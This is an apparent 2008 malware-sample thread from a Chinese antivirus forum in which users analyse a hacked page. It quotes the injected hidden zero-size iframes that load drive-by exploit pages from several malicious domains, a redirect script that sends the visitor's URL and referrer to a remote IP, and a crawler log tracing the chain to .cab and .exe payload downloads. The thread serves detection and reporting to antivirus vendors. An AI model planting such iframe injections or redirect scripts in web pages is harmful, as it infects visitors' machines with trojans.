查看: 2780|回复: 9
收起左侧

[病毒样本] 循环挂马,暂时没找到能查出来的杀毒软件

[复制链接]
pp0613
发表于 2008-6-4 10:23:21 | 显示全部楼层 |阅读模式
从这个地址抓到的。卡巴会报。但是里面的网马下载后查不出来

<iframe src="http://w.aeaer.com/ae.htm" width=0 height=0></iframe>
<iframe src="http://qi.ccbtv.net/btv.htm" width=0 height=0></iframe>
<iframe src="http://88.881215.com/88.htm" width=0 height=0></iframe>
<iframe src=http://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src="http://w.aeaer.com/i.htm" width=0 height=0></iframe>
<iframe src=http://www.fire321.cn/shan.htm width=100 height=0></iframe>
<iframe src="http://czz.aeaer.com/c.htm" width=0 height=0></iframe>
<iframe src=http://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src="http://88.881215.com/in.htm" width=0 height=0></iframe>
<iframe src=http://www.fire321.cn/shan.htm width=100 height=0></iframe>
<iframe src="http://czz.aeaer.com/c.htm" width=0 height=0></iframe>
<iframe src=http://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src=http://www.fire321.cn/shan.htm width=100 height=0></iframe>
<iframe src="http://qi.ccbtv.net/v.htm" width=0 height=0></iframe>
<iframe src="http://czz.aeaer.com/c.htm" width=0 height=0></iframe>
下载后应该有不少新漏洞。不知道公开了没....
希望会的朋友可以上报到杀毒软件商那去~~

评分

参与人数 1经验 +4 收起 理由
qianwenxiang + 4 感谢支持,欢迎常来: )

查看全部评分

pp0613
 楼主| 发表于 2008-6-4 10:24:01 | 显示全部楼层
xxxy.czu.cn/jsjggjck/cg/data/tk.htm  是这个地址....上面忘写了...
ranguangning
头像被屏蔽
发表于 2008-6-4 10:24:55 | 显示全部楼层
【老顾客了】
shmily512099
发表于 2008-6-4 10:55:32 | 显示全部楼层
木马名称:Trojan.Win32.Agent.nar

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\K1TOWF83\014[1].EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?
木马名称:Trojan.Win32.Agent.nar

程序:
C:\WINDOWS\NTUSER.COM
是木马程序!
已成功阻止其运行,是否要删除此文件?


点了一个网站微点就报已知了!
shmily512099
发表于 2008-6-4 10:56:42 | 显示全部楼层
其他网站基本就是这2个东西
qigang
发表于 2008-6-4 20:57:56 | 显示全部楼层

http://xxxy.czu.cn/jsjggjck/cg/data/tk.htm

<html><head><link rel="stylesheet" type="text/css" href="http://61.164.55.62:8080/css.css?aimt=242" /></head>
<script type="text/javascript">
var pp = "242&pre="+(new Date()).getTime();
var s=String(window.location.href);
var host=escape(s.substring(7,s.indexOf('/',7)));
var ref=escape(document.referrer);
s = escape(s);
if (self.location == top.location)
    document.location="http://61.164.55.62/dnsA.aspx?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
else
    document.location="http://61.164.55.62/dnsB.aspx?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
</script><body></body></html>



没有问题呀。
qigang
发表于 2008-6-4 21:03:59 | 显示全部楼层

一些老顾客,未解完!

Log is generated by FreShow.
[wide]http://w.aeaer.com/ae.htm
    [frame]http://jjj.hfb86.cn/w6.htm
        [frame]http://ccc.bfd67.cn/web/bd.htm
            [object]http://n.gan360.com/ad.cab
            [script]http://ccc.bfd67.cn/web/014.js
                [object]http://n.gan360.com/0014.exe
            [frame]http://ccc.bfd67.cn/web/og.htm
            [script]http://ccc.bfd67.cn/web/rl.js
            [frame]http://ccc.bfd67.cn/web/Rl2.htm
            [script]http://ccc.bfd67.cn/web/bf.js
        [script]http://ww4.tongji123.com/t1.aspx?id=44206085
            [frame]http://ww4.tongji123.com/s.aspx?i='+cqd+yj+'
        [script]http://s90.cnzz.com/stat.php?id=880299&web_id=880299
        [script]http://js.users.51.la/1876325.js
    [frame]http://w.aeaer.com/i.htm
        [frame]http://www.jjkkuui.cn/web/6619038.htm
            [frame]http://www.jjkkuui.cn/web/htm.html
                [object]http://exe.wokaixin.com/ad.cab
                [script]http://www.jjkkuui.cn/web/014.js
                [frame]http://www.jjkkuui.cn/web/og.htm
                [script]http://www.jjkkuui.cn/web/rl.js
                [frame]http://www.jjkkuui.cn/web/Rl2.htm
                [script]http://www.jjkkuui.cn/web/bf.js
            [script]http://js.users.51.la/1153797.js
            [script]http://ww4.tongji123.com/g3.aspx?id=40499922
            [script]http://count19.51yes.com/click.aspx?id=193979895&logo=1
    [frame]http://www.fire321.cn/shan.htm
        [object]http://www.live322.cn/4562.swf
        [object]http://www.live322.cn/4561.swf
    [frame]http://czz.aeaer.com/c.htm
        [frame]http://iphone004.com/one/huai5.htm
            [frame]http://iphone004.com/wmwm/index.htm
                [object]http://xia.iphone001.com/down/abd.cab
                [script]http://iphone004.com/wmwm/014.js
                [script]http://iphone004.com/wmwm/rl.js
                [frame]http://iphone004.com/wmwm/lz.htm
            [script]http://js.users.51.la/1897033.js
qianwenxiang
发表于 2008-6-4 21:12:11 | 显示全部楼层
avast (VPS 0531-1) : 2

rl.exe\[Upack]\[Embedded#03008]\[Embedded#9008]
Win32:Downloader-BBQ [Trj]

test.exe\[Upack]
Win32:GaoBot-2437 [Trj]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-6-2 08:36 , Processed in 0.133273 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表